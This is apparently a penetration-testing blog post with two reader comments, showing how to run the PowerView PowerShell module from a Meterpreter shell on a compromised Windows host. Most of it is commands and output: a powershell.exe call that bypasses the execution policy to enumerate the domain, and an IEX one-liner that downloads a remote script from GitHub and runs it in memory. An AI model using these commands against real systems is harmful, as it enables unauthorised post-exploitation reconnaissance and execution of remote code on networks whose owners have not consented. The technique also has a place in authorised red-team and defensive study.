http://carnal0wnage.attackresearch.com/2012/10/run-powershell-module-in-meterpreter.html
More recent posts on the subject by harmj0y
http://www.harmj0y.net/blog/powershell/derbycon-powershell-weaponization/
Anyway, #2 from The PowerShell Weaponization Problem works ok if you don't care about the code being on disk
Gist with the command
meterpreter > shell
Process 2380 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\user\Desktop\PowerTools\PowerView\powerview.ps1'; Get-NetDomain}"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>
Via IEX download method: Gist with the command
C:\Users\user\Desktop>powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Veil-Framework/PowerTools/master/PowerView/powerview.ps1'); Get-NetDomain"
UNLUCKYCOMPANY.COM
C:\Users\user\Desktop>
2 comments:
Executing Powershell through Meterpreter is a hot discussion topic at the moment. A few people are pondering options and I'm playing with a couple of ideas to make this a little nicer. It might be nice to have a command that sits alongside "shell" which is called "powershell" that just gives you an interactive PS prompt. This might have to be done via a new extension though, given that it'd probably require automation of PS rather than shelling out to it and mucking with std handles.
So watch this space!
yes plz :-)
Post a Comment